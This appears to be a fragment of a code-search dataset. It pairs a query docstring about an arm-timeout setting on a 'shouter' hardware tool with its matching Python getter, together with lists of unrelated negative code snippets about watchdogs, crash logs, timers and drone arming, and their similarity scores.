"def check(self):\n curtime = time.time()\n failed_watchdogs = []\n for watchdog, filename, st_info in self._list_gen(self.watchdog_path):\n if curtime < st_info.st_mtime:\n # If the watchdog is set in the future, then service is still\n # alive\n pass\n\n else:\n # Otherwise, this is a watchdog failure\n _LOGGER.warning('Watchdog failed: %r.', watchdog)\n failed_watchdogs.append((filename, watchdog, st_info.st_mtime))\n\n # Retreive the payload of failed watchdogs\n if failed_watchdogs:\n failures = []\n for filename, name, failed_at in failed_watchdogs:\n try:\n with open(filename, 'r') as f:\n data = f.read()\n except OSError:\n _LOGGER.exception('Reading watchdog data')\n data = ''\n failures.append((name, failed_at, data))\n\n return failures\n\n else:\n return []",
"def _localHandleFailedRuns(self, failedRuns):\n if len(failedRuns) > 0:\n self.raiseADebug(' Continuing with reduced-size Monte-Carlo sampling.')",
"def collect_free_breaks(self, *args):\n return _ida_hexrays.cinsn_t_collect_free_breaks(self, *args)",
"def snmpqosqos_sch_leaf_recycle_failures(self) :\n\t\ttry :\n\t\t\treturn self._snmpqosqos_sch_leaf_recycle_failures\n\t\texcept Exception as e:\n\t\t\traise e",
"def _look_for_new_crash_logs(self, run_results, start_time):\n crashed_processes = []\n test_to_crash_failure = {}\n\n # reset static variables for Failure type classes\n test_failures.AbstractTestResultType.port = self._port\n test_failures.AbstractTestResultType.result_directory = self._results_directory\n test_failures.AbstractTestResultType.filesystem = self._filesystem\n\n for test, result in run_results.unexpected_results_by_name.items():\n if result.type != ResultType.Crash:\n continue\n for failure in result.failures:\n if (not isinstance(failure, test_failures.FailureCrash)\n or failure.has_log):\n continue\n crashed_processes.append(\n [test, failure.process_name, failure.pid])\n test_to_crash_failure[test] = failure\n\n sample_files = self._port.look_for_new_samples(crashed_processes,\n start_time) or {}\n for test, sample_file in sample_files.items():\n test_failures.AbstractTestResultType.test_name = test\n test_result = run_results.unexpected_results_by_name[test]\n artifact_relative_path = self._port.output_filename(\n test, test_failures.FILENAME_SUFFIX_SAMPLE, '.txt')\n artifacts_sub_dir = test_result.artifacts.ArtifactsSubDirectory()\n artifact_abspath = self._filesystem.join(self._results_directory,\n artifacts_sub_dir,\n artifact_relative_path)\n self._filesystem.maybe_make_directory(\n self._filesystem.dirname(artifact_abspath))\n self._filesystem.copyfile(sample_file, artifact_abspath)\n test_result.artifacts.AddArtifact(\n 'sample_file',\n self._filesystem.join(artifacts_sub_dir,\n artifact_relative_path))\n\n new_crash_logs = self._port.look_for_new_crash_logs(\n crashed_processes, start_time) or {}\n for test, (crash_log, crash_site) in new_crash_logs.items():\n test_failures.AbstractTestResultType.test_name = test\n failure.crash_log = crash_log\n failure.has_log = self._port.output_contains_sanitizer_messages(\n failure.crash_log)\n test_result = run_results.unexpected_results_by_name[test]\n test_result.crash_site = crash_site\n test_to_crash_failure[test].create_artifacts(\n test_result.artifacts, force_overwrite=True)",
"def geterr():\n return __errprof.state.copy()",
"def clean_stale_issues():\n from security_monkey.common.audit_issue_cleanup import clean_stale_issues\n clean_stale_issues()",
"def get_all_failures(self):\n return self._get_filtered_results(success=False)",
"def storefront_check_errors():\n\n\tcurrentView = uidoc.ActiveView\n\tfamTypeDict = GetFamilyTypeDict(\"Fabrication-Error-Symbol\")\n\n\t# Clear existing error notations\n\terrorNotations = list(GetElementsInView(BuiltInCategory.OST_GenericAnnotation, Autodesk.Revit.DB.FamilyInstance, currentView.Id))\n\terrorNotations = FilterElementsByName(doc, errorNotations,[\"Fabrication\",\"Error-Symbol\"], False)\n\tif errorNotations:\n\t\twith rpw.db.Transaction(\"Place Errors\"):\n\t\t\tfor error in errorNotations:\n\t\t\t\tdoc.Delete(error)\n\n\n\tdef PointsAndErrors(mullions_list, errorName, cat_or_ids):\n\t\t\"\"\"adds to lists of points and errors\"\"\"\n\t\terrorsToFlag = []\n\t\tcompList =[]\n\t\tfor m in mullions_list:\n\t\t\tmElem = doc.GetElement(m)\n\t\t\tif m not in compList:\n\t\t\t\tintersectingMulls = FindIntersectingMullions(mElem, cat_or_ids)\n\t\t\t\tif list(intersectingMulls):\n\t\t\t\t\tmullPt = mElem.Location.Point\n\t\t\t\t\terrorsToFlag.append([mullPt, errorName])\n\t\t\t\t\tfor mm in list(intersectingMulls):\n\t\t\t\t\t\tcompList.append(mm.Id)\n\t\treturn errorsToFlag\n\n\tdef MullionClash():\n\n\t\terrorsToFlag = []\n\n\t\tselectedLevel = __revit__.ActiveUIDocument.ActiveView.GenLevel.Id\n\n\t\tallMullions = GetAllElements(doc, BuiltInCategory.OST_CurtainWallMullions, Autodesk.Revit.DB.FamilyInstance, currentView=True)\n\t\tallWalls = GetAllElements(doc, BuiltInCategory.OST_Walls, Autodesk.Revit.DB.Wall, currentView=True)\n\n\t\tallWalls = FilterElementsByName(doc, allWalls, [\"Storefront\",\"Storefront\"], True)\n\n\t\terrorsToFlag += PointsAndErrors(allMullions, \"Mullion-Mullion Intersects\", BuiltInCategory.OST_CurtainWallMullions)\n\t\terrorsToFlag += PointsAndErrors(allMullions, \"Mullion-Panel Intersects\", BuiltInCategory.OST_CurtainWallPanels)\n\t\tif allWalls:\n\t\t\terrorsToFlag += PointsAndErrors(allMullions, \"Mullion-Wall Intersects\", allWalls)\n\n\t\treturn errorsToFlag\n\n\tdef PanelClash():\n\n\n\t\terrorsToFlag = []\n\t\t\n\t\tallPanels = GetAllElements(doc, BuiltInCategory.OST_Windows, Autodesk.Revit.DB.FamilyInstance, currentView=True)\n\t\tallPanels = FilterDemolishedElements(doc, allPanels)\n\n\t\tpanelMinWidth = 0.45\n\t\tpanelMaxWidth = 5.0\n\t\tpanelMaxHeight = 8.14\n\n\t\t### ITERATE OVER PANEL LIST ###\n\t\tfor p in allPanels:\n\t\t\tfamInst = doc.GetElement(p)\n\n\t\t\tpan_height = famInst.Parameter[BuiltInParameter.FAMILY_HEIGHT_PARAM].AsDouble()\n\t\t\tpan_width = famInst.Parameter[BuiltInParameter.FAMILY_WIDTH_PARAM].AsDouble()\n\n\t\t\tif \"empty\" not in famInst.Name.lower():\n\t\t\t\tif pan_width < panelMinWidth:\n\t\t\t\t\terrorsToFlag.append([famInst.GetTransform().Origin, \"Small Panel\"])\n\t\t\t\telif pan_width > panelMaxWidth:\n\t\t\t\t\terrorsToFlag.append([famInst.GetTransform().Origin, \"Wide Panel\"])\n\t\t\t\telif pan_height > panelMaxHeight:\n\t\t\t\t\terrorsToFlag.append([famInst.GetTransform().Origin, \"Tall Panel\"])\n\t\t\telse:\n\t\t\t\tpass\n\t\t\n\t\treturn errorsToFlag\n\n\tdef ECWallClash():\n\n\t\terrorsToFlag = []\n\t\tcolumnsLinesEdgesEC = []\n\t\twallsLinesEdgesEC = []\n\n\n\t\tdocLoaded = RevitLoadECDocument(quiet=True)\n\t\tif docLoaded[0]:\n\t\t\tdocEC = docLoaded[0]\n\t\t\tecTransform = docLoaded[1]\n\n\t\t\tselectedLevel = __revit__.ActiveUIDocument.ActiveView.GenLevel.Id\n\n\t\t\tselectedLevelInst = doc.GetElement(selectedLevel)\n\t\t\tlevelElevationEC = None \n\t\t\tfor p in selectedLevelInst.Parameters:\n\t\t\t\tif p.Definition.Name == \"Elevation\":\n\t\t\t\t\tlevelElevationEC = p.AsDouble()\n\n\t\t\tallWallsEC = GetAllElements(docEC, BuiltInCategory.OST_Walls, Autodesk.Revit.DB.Wall)\n\t\t\tallColumnsEC = GetAllElements(docEC, BuiltInCategory.OST_Columns, Autodesk.Revit.DB.FamilyInstance)\n\t\t\tallColumnsEC += GetAllElements(docEC, BuiltInCategory.OST_StructuralColumns, Autodesk.Revit.DB.FamilyInstance)\n\n\t\t\tselectedWallsEC = FilterElementsByLevel(docEC, allWallsEC, levelElevationEC)\n\t\t\tselectedColumnsEC = FilterElementsByLevel(docEC, allColumnsEC, levelElevationEC)\n\n\t\t\twallsLinesEdgesEC = GetWallEdgeCurves(docEC, selectedWallsEC, ecTransform)\n\t\t\tcolumnsLinesEdgesEC = GetColumnEdgeCurves(docEC, selectedColumnsEC, ecTransform)\n\n\t\tallWalls = GetAllElements(doc, BuiltInCategory.OST_Walls, Autodesk.Revit.DB.Wall, currentView=True)\n\t\tstorefrontWalls = FilterElementsByName(doc, allWalls,[\"Storefront\",\"Storefront\"], False)\n\t\tstorefrontWalls = FilterWallsByKind(doc, storefrontWalls, \"Basic\")\n\n\t\tobstructionEdges = columnsLinesEdgesEC\n\t\tobstructionEdges += wallsLinesEdgesEC\n\n\t\tif obstructionEdges:\n\t\t\tfor sfWallId in storefrontWalls:\n\t\t\t\tsfWall = doc.GetElement(sfWallId)\n\t\t\t\tlocLine = sfWall.Location.Curve\n\t\t\t\tlocLineStart = locLine.GetEndPoint(0)\n\t\t\t\tlocLineEnd = locLine.GetEndPoint(1)\n\n\t\t\t\tfor obstructionLine in obstructionEdges:\n\t\t\t\t\tobstLineElevation = obstructionLine.GetEndPoint(0).Z\n\t\t\t\t\tlocLineStart = XYZ(locLineStart.X, locLineStart.Y, obstLineElevation)\n\t\t\t\t\tlocLineEnd = XYZ(locLineEnd.X, locLineEnd.Y, obstLineElevation)\n\t\t\t\t\tlocLineFlat = Line.CreateBound(locLineStart, locLineEnd)\n\t\t\t\t\tintersection = RevitCurveCurveIntersection(locLineFlat,obstructionLine)\n\n\t\t\t\t\tif intersection:\n\t\t\t\t\t\t#ERROR: Hit Existing Condition\n\t\t\t\t\t\terrorsToFlag.append([intersection, \"Hit EC\"])\n\n\t\treturn errorsToFlag\n\n\tallErrors = []\n\tallErrors += ECWallClash()\n\tallErrors += MullionClash()\n\tallErrors += PanelClash()\n\n\terrorSymbolId = famTypeDict[\"Fabrication-Error-Symbol\"]\n\n\tif allErrors:\n\t\twith rpw.db.Transaction(\"Error Check\"):\n\t\t\tRevitPlaceErrorsInView(currentView, allErrors, errorSymbolId)",
"def get_crash_events_data(self, tc_name):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)",
"def check_errors(self) -> None:\n # TODO check the manual for error codes & interpert them.\n return self.send(self.cmd.GET_GLOBALSTATUS_CURRENTERROR)",
"def getPendingFailedRejectedOSPatches(self, df: str = None, ts: str = None, status: str = None,\n patch_type: str = None, severity: str = None, cursor: str = None,\n pageSize: int = None):\n params = {\n 'df': df,\n 'ts': ts,\n 'status': status,\n 'type': patch_type,\n 'severity': severity,\n 'cursor': cursor,\n 'pageSize': pageSize\n }\n return self.api_get_request(f'{self.NINJA_API_QUERIES_OS_PATCHES}', params=params)",
"def traceback(self):",
"def diagnostic_trouble_codes(self):\n return self._diagnostic_trouble_codes",
"def getReplicasLFC(guids, lfchost):\n\n ec = 0\n pilotErrorDiag = \"\"\n error = PilotErrors()\n replica_list = []\n\n try:\n import lfc\n except Exception, e:\n pilotErrorDiag = \"getReplicasLFC() could not import lfc module: %s\" % str(e)\n ec = error.ERR_GETLFCIMPORT\n\n tolog(\"Get function using LFC_HOST: %s\" % (lfchost))\n\n os.environ['LFC_HOST'] = lfchost\n os.environ['LFC_CONNTIMEOUT'] = '60'\n os.environ['LFC_CONRETRY'] = '2'\n os.environ['LFC_CONRETRYINT'] = '60'\n\n try:\n ret, replica_list = lfc.lfc_getreplicas(guids, \"\")\n except Exception, e:\n pilotErrorDiag = \"Failed to get LFC replicas: Exception caught: %s\" % str(e)\n tolog(\"!!FAILED!!2999!! %s\" % (pilotErrorDiag))\n tolog(\"getReplicasLFC() finished (failed)\")\n ec = error.ERR_FAILEDLFCGETREPS\n\n if ret != 0:\n err_num = lfc.cvar.serrno\n err_string = lfc.sstrerror(err_num)\n pilotErrorDiag = \"Failed to get LFC replicas: %d (lfc_getreplicas failed with: %d, %s)\" %\\\n (ret, err_num, err_string)\n tolog(\"!!WARNING!!2999!! %s\" % (pilotErrorDiag))\n tolog(\"getReplicas() finished (failed)\")\n ec = error.ERR_FAILEDLFCGETREPS\n\n return ec, pilotErrorDiag, replica_list",
"def _get_resends(self):\n if not self.has_error():\n return []\n\n errors = []\n i = 0\n for item in self.my_json['results']:\n if item.has_key('error') and item['error'] == 'Unavailable':\n errors.append((i, item['error']))\n i += 1\n return errors",
"def find_backtrace(self):\n return [ft for ft in os.listdir(self.output_dir)\n if os.path.isfile(ft) and ft.startswith(\"Backtrace.\")]",
"def test_launch_failures_hw(self):\n self.test_launch_failures()",
"def GetExpectedCrashes(self, args: ct.TestArgs) -> None:\n # args[0] is the PixelTestPage for the current test.\n return args[0].expected_per_process_crashes",
"def _raise_performing_request_error(self, *args, **kwargs):",
"def on_request_error(locust_instance, exception, tb, **kwargs):",
"def after_make_v202111_runoff_file(msg, config, checklist):\n next_workers = {\"crash\": [], \"failure\": [], \"success\": []}\n return next_workers[msg.type]",
"def loading_failures():\n\n import simtk.openmm as mm\n print(mm.Platform.getPluginLoadFailures())",
"def test_obtain_issues_http_error(self, mock_url_read):\n mock_url_read.side_effect = urllib.error.HTTPError('raise', None, None, None, None)\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)",
"def test_sync_call_healthy_only(self):\n actors = [Actor.remote(i) for i in range(4)]\n manager = FaultTolerantActorManager(actors=actors)\n\n results = []\n for _ in range(10):\n results.extend(manager.foreach_actor(lambda w: w.call()).ignore_errors())\n # Wait for actors to recover.\n wait_for_restore()\n\n # Notice that since we only fire calls against healthy actors,\n # we wouldn't be aware that the actors have been recovered.\n # So once an actor is taken out of the lineup (10% chance),\n # it will not go back in, and we should have few results here.\n # Basically takes us 7 calls to kill all the actors.\n # Note that we can hardcode 10 here because we are using deterministic\n # sequences of random numbers.\n self.assertEqual(len(results), 7)\n\n manager.clear()",
"def get_far_crefs_from( ea ):\r\n\tret = []\r\n\txrf = get_first_fcref_from( ea )\r\n\tif xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_fcref_from( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_fcref_from( ea, xrf )\r\n\treturn ret",
"def threat_exceptions(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"threat_exceptions\")"
] | [
"0.6717997",
"0.61814696",
"0.5997935",
"0.5937447",
"0.5786711",
"0.5544165",
"0.5489587",
"0.54597056",
"0.53924805",
"0.53853124",
"0.53460693",
"0.53460693",
"0.5332667",
"0.5330461",
"0.5298619",
"0.5260537",
"0.5236995",
"0.5182294",
"0.5093936",
"0.50649893",
"0.5040983",
"0.5036408",
"0.5035424",
"0.50090665",
"0.50085974",
"0.4980584",
"0.49759415",
"0.49644327",
"0.4933094",
"0.49291593",
"0.49235272",
"0.49101245",
"0.49047002",
"0.49002713",
"0.4878564",
"0.48696467",
"0.48670208",
"0.48593932",
"0.48448092",
"0.48208028",
"0.48112774",
"0.4809371",
"0.48079124",
"0.48030305",
"0.47844744",
"0.47835907",
"0.4767053",
"0.4759268",
"0.475307",
"0.47482467",
"0.474175",
"0.4723633",
"0.4723309",
"0.47175163",
"0.47131613",
"0.4712467",
"0.4704188",
"0.46872148",
"0.46870866",
"0.46737298",
"0.4673241",
"0.4669778",
"0.4668355",
"0.4664168",
"0.46476328",
"0.46388653",
"0.4628997",
"0.46283606",
"0.46077117",
"0.46054804",
"0.46047163",
"0.4588132",
"0.45770726",
"0.45751572",
"0.4570581",
"0.45663217",
"0.456078",
"0.455937",
"0.45520166",
"0.4548669",
"0.45480132",
"0.4546465",
"0.45412332",
"0.45367056",
"0.45305178",
"0.45297685",
"0.45287573",
"0.45283678",
"0.4518613",
"0.45016453",
"0.45002225",
"0.44964063",
"0.44877067",
"0.44797888",
"0.44690195",
"0.4467461",
"0.44488028",
"0.44455418",
"0.44430178",
"0.44412142"
] | 0.807573 | 0 |
Arm timeout Because of safty reasons we will monitor the trigger when in the armed state. The trigger needs to be activated within the timeout programmed. Every trigger will reset the timer with every pulse. If the time out occurs, the shouter will disarm and disable the high voltage circuitry. The Arm timer will be reset on every trigger / internal or external. NOTE Valid range is between 1 60 minutes | def get_arm_timeout(self, timeout = 0):
self.get_option_from_shouter([t_16_Bit_Options.ARM_TIMEOUT], BP_TOOL.REQUEST_16)
return self.config_16.options[t_16_Bit_Options.ARM_TIMEOUT]['value'] | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def timeout(self):\n self.timeout_scan_flag=True\n self.timer.stop()\n self.status_sig.emit([\"Update_Status\",\"Timeout during acquisition\",'log'])\n self.status_sig.emit([\"Timeout\"])",
"def set_timeout(self, timeout):\r\n return self._arm.set_timeout(timeout)",
"def power_off(timeout: int = 0) -> None:",
"def reset_timeout (self, new_timeout):\n self.timer.cancel()\n self.timer = Timeout(new_timeout, TestIsTakingTooLong(new_timeout))",
"def event_m10_29_x35():\r\n \"\"\"State 0,2: Timer start judgment\"\"\"\r\n CompareAreaTimer(0, 0, 0, 0)\r\n CompareAreaTimer(1, 0, 0, 2)\r\n if ConditionGroup(0):\r\n \"\"\"State 3: Start area timer\"\"\"\r\n StartAreaTimer(0)\r\n elif ConditionGroup(1):\r\n \"\"\"State 4: Restart area timer\"\"\"\r\n RestartAreaTimer(0)\r\n \"\"\"State 1: Has the waiting time been exceeded?\"\"\"\r\n CompareAreaTimer(0, 0, 300, 2)\r\n assert ConditionGroup(0)\r\n \"\"\"State 5: Stop area timer\"\"\"\r\n PauseAreaTimer(0)\r\n \"\"\"State 6: End state\"\"\"\r\n return 0",
"def alarm_t(self, **kwargs):\n if self.verbose:\n print(\"\\t{} |{}| Initialization begins.\".format(Timer.OK, self.tinfo['name']))\n time_asleep = 1\n if self.testmode is False:\n while self.tinfo['alarm_time'] >= datetime.now():\n if time_asleep % 60 == 0:\n if self.verbose:\n print(\"|{}| +1 minute.\".format(datetime.now().strftime(\"%H:%M:%S\"))) \n time_asleep += 1\n sleep(1)\n self.execute_target(self.tinfo)\n return True\n elif self.testmode is True:\n print(\"\\t{} **** TESTMODE.Forcing immediate exec!\".format(Timer.OK))\n self.execute_target()\n return True\n else:\n print(\"\\t testmode must be True or False!\")\n return False",
"def lightleep(time_ms: int = None) -> None:",
"def time_pulse_us(pin:Pin, pulse_level:int, timeout_us:int=1000000, /) -> int:",
"def clear_timeout():\n signal.alarm(0)",
"def stop_alarm(self):\n self.out_power.pulse()",
"def timeragent(forwho,timeoutfunction,interval):\r\n\r\n timerx = QtCore.QTimer()\r\n timerx.setInterval(interval)\r\n timerx.stop()\r\n\r\n forwho.connect(timerx,SIGNAL(\"timeout()\"),timeoutfunction)\r\n return timerx",
"def get_trigger(self, timeout=300):\n with self.vr_protect:\n newtrig = trigger(self.vr_trig_queue, timeout=timeout)\n if self.vr_monthread is None:\n self.camhand.start_camera() # starts camera if not running\n self.vr_monthread = threading.Thread(name='recorder', target=self.monitor, args=[newtrig])\n self.vr_monthread.start()\n else:\n print('already ready')\n self.vr_trig_queue.put((newtrig,'add')) # add to q first so the new thread has one to pick up\n return newtrig",
"def test_timeoutReset(self):\n for i in range(3):\n self.circuit_breaker.failure()\n self.time.advance(29.0)\n available29sec = self.circuit_breaker.available()\n self.time.advance(1.1)\n available30sec = self.circuit_breaker.available()\n self.assertEqual((available29sec, available30sec),\n (False, True))",
"def trigger(self):\n if self.timer is None or time.time() - self.last_try > self.min_sec * 2:\n self.timer = time.time()\n self.last_try = time.time()\n return False\n elif time.time() - self.timer > self.min_sec:\n self.reset()\n return True\n else:\n self.last_try = time.time()\n return False",
"def alarmoff() :\n s.alarm(False, \"\")",
"def reset_timer():\n resetTimer = time.time()\n target_time.clear()\n target_time.append(resetTimer)",
"def _arm(self,n_ticks):\n # Set down counter\n self.__counter = n_ticks\n\n # Arm by adding to QF_tick timer list here\n self.__qf.addTimer(self)",
"def wakeup(\n self, timeout: int, callback: Callable[[RTC], None] | None = None, /\n ) -> None:",
"def caltimer(ants=0, reps=1, tmo=15) :\n if ants == 0: ants = currentAntennaNumbers()\n antlist = helpers.makeList(ants)\n def looper(a, t, skypos):\n if skypos : label = \"SKY\"\n else : label = \"AMBIENT\"\n print label + \" started\"\n t0 = time.time()\n timeout = t0 + t\n if skypos: state = carma.antenna.common.CalibratorControl.SKY\n else: state = carma.antenna.common.CalibratorControl.AMBIENT\n s.cal(state, a)\n keepGoing = True\n while keepGoing:\n t = time.time()\n res = wait(CAL, a, timeout-t, ANY)\n #print \"RES:\", res.ready, res.notready\n t = time.time()\n r = res.ready\n a = res.notready\n if len(r) > 0:\n m = \" %4.2f: \" %(t-t0)\n prefix = \"\"\n for i in r:\n m += prefix + \"C%d\" %i\n prefix = \", \"\n print m\n if t >= timeout:\n keepGoing = False\n if len(a) > 0:\n m = \" did not complete: \" \n prefix = \"\"\n for i in a:\n m += prefix + \"C%d\" %i\n prefix = \", \"\n print m\n print \" Timeout \" + label \n return \n if len(a) == 0: keepGoing = False \n print \" Completed \" + label \n for r in range(reps) :\n looper(a=antlist, t=tmo, skypos=False)\n looper(a=antlist, t=tmo, skypos=True)",
"def _banner_timeout(self):\n self.sm.on_state_event(self.events.BANNERTIMEOUT)",
"def reset_timeout(self, timeout: float) -> None:\n self._reset_timeout = timeout",
"def _reset_ack_timeout(self, timeout):\n if self._ack_handle.active():\n self._ack_handle.reset(timeout)\n else:\n self._ack_handle = REACTOR.callLater(timeout, self._send_ack)",
"def setTimeOut(self, timeout=6.0):\n self.timeout = timeout",
"def pytest_timeout_cancel_timer(item):",
"def setScreenTimeout(self, timeInMinutes, unitCode=0):\n if timeInMinutes < 0:\n timeInMinutes = 0\n elif timeInMinutes > 15:\n timeInMinutes = 15\n resp = self.XAPCommand('TOUT', timeInMinutes, unitCode=unitCode)\n return int(resp)",
"def arm_and_takeoff(aTargetAltitude):\r\n\r\n print(\"Basic pre-arm checks\")\r\n # Don't try to arm until autopilot is ready\r\n while not vehicle.is_armable:\r\n print(\" Waiting for vehicle to initialise...\")\r\n time.sleep(1)\r\n\r\n print(\"Arming Throttle\")\r\n # Copter should arm in GUIDED mode\r\n\t# XXX : what the heck is this?\r\n #vehicle.mode = VehicleMode(\"GUIDED\")\r\n vehicle.armed = True\r\n\r\n # Confirm vehicle armed before attempting to take off\r\n while not vehicle.armed:\r\n print(\" Waiting for arming...\")\r\n time.sleep(1)",
"def analogDaTimeoutOff(self, Debug=0):\n self.bib.DapiSpecialCommand.argtypes = \\\n [c_ulong, c_ulong, c_ulong, c_ulong, c_ulong]\n self.bib.DapiSpecialCommand.restype = None\n self.bib.DapiSpecialCommand(self.handle, self.DAPI_SPECIAL_CMD_TIMEOUT, \\\n self.DAPI_SPECIAL_TIMEOUT_DEACTIVATE, 0, 0) # ...switch off TO \n timeout_status = self.analogDaTimeoutStatus() # check it...\n if Debug == 1 and timeout_status == 0:\n print(\"Timeout off:\",timeout_status)\n else:\n return(timeout_status)",
"def pytest_timeout_set_timer(item, settings):",
"def __init__(self, timeout=129600):\n self.timeout = timeout",
"def set_alarm(self):\n time_str = self.settings_window.validate_alarm_input()\n if time_str:\n # Update displayed alarm time settings and main window\n self.main_window.alarm_time_lcd.display(time_str)\n self.settings_window.set_alarm_input_success_message_with_time(time_str)\n self.config[\"main\"][\"alarm_time\"] = time_str\n\n # Set alarm play timer\n self.alarm_dt = utils.time_str_to_dt(time_str)\n alarm_wait_ms = (self.alarm_dt - datetime.now()).seconds * 1000\n\n event_logger.info(\"Setting alarm for %s\", time_str)\n self.alarm_timer.start(alarm_wait_ms)\n\n # Setup alarm build time for 5 minutes earlier (given large enough timer)\n ALARM_BUILD_DELTA = 5 * 60 * 1000\n alarm_build_wait_ms = max((0, alarm_wait_ms - ALARM_BUILD_DELTA)) # 0 if not enough time\n\n alarm_build_dt = self.alarm_dt - timedelta(minutes=5)\n event_logger.info(\"Setting alarm build for %s\", alarm_build_dt.strftime(\"%H:%M\"))\n self.alarm_build_timer.start(alarm_build_wait_ms)\n\n # Set screen brightness to low if nighttime and nigthmode enabled\n if self._nightmode_active():\n low_brightness = self.config[\"main\"].get(\"low_brightness\", 12)\n rpi_utils.set_display_backlight_brightness(low_brightness)",
"def wait_for_disarm(vehicle, timeout=180):\n wait_count = 0\n sleep_period = 1\n log_period = 30\n \n timeout_limit = timeout/sleep_period\n log_count = log_period/sleep_period\n \n while vehicle.armed:\n if wait_count % log_count == 0: # 10sec period logging\n util.log_info(\"Waiting for the copter to disarm.\")\n \n if wait_count >= timeout_limit:\n util.log_warning(\"Wait timeout! Exit script now!\")\n break\n \n time.sleep(sleep_period)\n wait_count = wait_count + 1",
"def ll_uart_set_cmd_timeout(self,timeout = 10):\r\n\r\n self._ll_rx_timeout = timeout",
"def reset_timer(self, *_) -> \"ALL\":\n self.last = time.time()\n delta = time.time() - self.last\n if delta > 180:\n print(\n \"!!! Warning: Watchdog failure detected, spawning a fallback \"\n \"thread.\"\n )\n self.watchdog = FallbackWatchdog(self)\n self.watchdog.start()",
"def start_alarm(self):\n self.out_power.pulse()",
"def __init__(self, timeout_time):\n self.timeout_time = timeout_time",
"def set_timeout(seconds, on_timeout):\n\n def _sighandler(signum, frame):\n on_timeout()\n\n signal.signal(signal.SIGALRM, _sighandler)\n signal.alarm(seconds)",
"def set_timeout(self, timeout):\n if self.interface is not None:\n self.interface.timeout = timeout",
"def set_timeout(self, timeout):\n self.timeout = timeout",
"def arm_and_takeoff(vehicle, target_alt, loiter_time):\n util.log_info(\"Checking if armable.\")\n \n wait_count = 0\n while not vehicle.is_armable:\n time.sleep(.2)\n wait_count = wait_count + 1\n \n if wait_count % 25 == 0:\n util.log_warning(\"Vehicle not armable.\")\n \n if wait_count >= 100:\n util.log_warning(\"Unable to arm. Abort.\")\n shared.status['abort'] = True\n return False\n\n util.log_info(\"Switching to GUIDED and Arming.\")\n set_mode(vehicle, \"GUIDED\")\n\n util.log_debug(\"Arming...\")\n vehicle.armed = True\n time.sleep(3)\n \n wait_count = 0\n while True:\n time.sleep(.5)\n wait_count = wait_count + 1\n \n if vehicle.armed :\n util.log_info(\"Armed.\")\n break\n \n elif wait_count % 10 == 0:\n util.log_warning('Retry arming.')\n \n if wait_count >= 20:\n util.log_warning(\"Arming failed. Abort.\")\n shared.status['abort'] = True\n return False\n\n vehicle.simple_takeoff(target_alt) \n\n # Wait until the vehicle reaches a safe altitude (95%), or otherwise the command \n # after Vehicle.simple_takeoff will execute immediately, causing unexpected results.\n while True:\n util.log_debug(\"Altitude: %s\" % vehicle.location.global_relative_frame.alt) \n if vehicle.location.global_relative_frame.alt >= target_alt - shared.ALT_TOLERANCE:\n util.log_info(\"Target altitude reached: %s m.\" % vehicle.location.global_relative_frame.alt)\n break\n\n time.sleep(.5)\n \n time.sleep(loiter_time)\n return True",
"def set_fan_timer_timeout(self, time_: str = None):\r\n if time_ is not None:\r\n self._fan_timer_timeout = datetime.fromisoformat(time_)\r\n else:\r\n self._fan_timer_timeout = datetime.now() + self._fan_timer_duration\r\n\r\n self._logger.info(log_message_formatter(\r\n \"set\", f\"{self}\", \"fan_timer-timeout\", self.fan_timer_timeout))",
"def timeout(self, timeout):\n assert timeout is None or timeout > 0\n self._timeout = timeout",
"def timer(*args, endTimer: bool=True, lapTime: bool=True, name: AnyStr=\"\", startTimer:\n bool=True, **kwargs)->None:\n pass",
"def timer_object_timeout(seconds=5):\n def raise_timeout_exception():\n raise TimeoutReachedException(seconds=seconds)\n\n return Timer(seconds, raise_timeout_exception)",
"def set_timeout(self, timeout):\n pass",
"def set_invoke_timer(self, timeout, retry_entry=False):\n if self.timer_entry is not None and self.timer_entry.active:\n self.timer_entry.deactivate()\n #print(\"(%d) set_invoke_timer:\" % int(time.time()), timeout)\n self.timer_entry = query_management.QueryEntry(expire_after=timeout,\n callback_expire=self._perform_key_exchange,\n retry_count=0)\n if retry_entry:\n self.timer_entry.data[KeyType.retry_timer] = True",
"def set_tgpio_modbus_timeout(self, timeout, is_transparent_transmission=False, **kwargs):\r\n return self._arm.set_tgpio_modbus_timeout(timeout, is_transparent_transmission=is_transparent_transmission, **kwargs)",
"def input_to(timeout=1): # time after which enemies move automatically\n signal.signal(signal.SIGALRM, alarmhandler)\n signal.alarm(timeout)\n try:\n text = G()\n signal.alarm(0)\n return text\n except AlarmException:\n print(\"\\n Prompt timeout. Continuing\")\n signal.signal(signal.SIGALRM, signal.SIG_IGN)\n return ''",
"def settimeout(self,timeout=10):\r\n # Update\r\n self.timeout = timeout",
"async def async_alarm_arm_night(self, code: str | None = None) -> None:\n self._cluster_handler.arm(IasAce.ArmMode.Arm_Night_Sleep_Only, code, 0)\n self.async_write_ha_state()",
"def _default__band_timer(self):\n timer = QTimer()\n timer.setSingleShot(True)\n timer.timeout.connect(self._on_band_timer)\n return timer",
"def __init__(self, timeout=120):\n self.m_timeout = timeout",
"def _default__rose_timer(self):\n timer = QTimer()\n timer.setSingleShot(True)\n timer.timeout.connect(self._on_rose_timer)\n return timer",
"def arm_calibration(self):\n self.arm_motor.run_forever(speed_sp=900)\n while not self.touch_sensor.is_pressed:\n time.sleep(0.01)\n self.arm_motor.stop(stop_action=\"brake\")\n ev3.Sound.beep()\n self.arm_motor.run_to_rel_pos(\n speed_sp=900, position_sp=-5100)\n self.arm_motor.wait_while(ev3.Motor.STATE_RUNNING)\n print('motor is no longer running')\n ev3.Sound.beep()\n self.arm_motor.position = 0",
"def _wakeup(self, wakeup_timeout=10, response_timeout=3):\n pass",
"def _vios_waits_timed_out(no_rmc_vwraps, time_waited, max_wait_time=None):\n wait_time = max_wait_time\n if wait_time is None:\n wait_time = _LOW_WAIT_TIME\n # if any VIOS is still early in its startup, wait longer to give RMC\n # time to come up\n for vwrap in no_rmc_vwraps:\n if vwrap.uptime <= _UPTIME_CUTOFF:\n wait_time = _HIGH_WAIT_TIME\n break\n return time_waited >= wait_time",
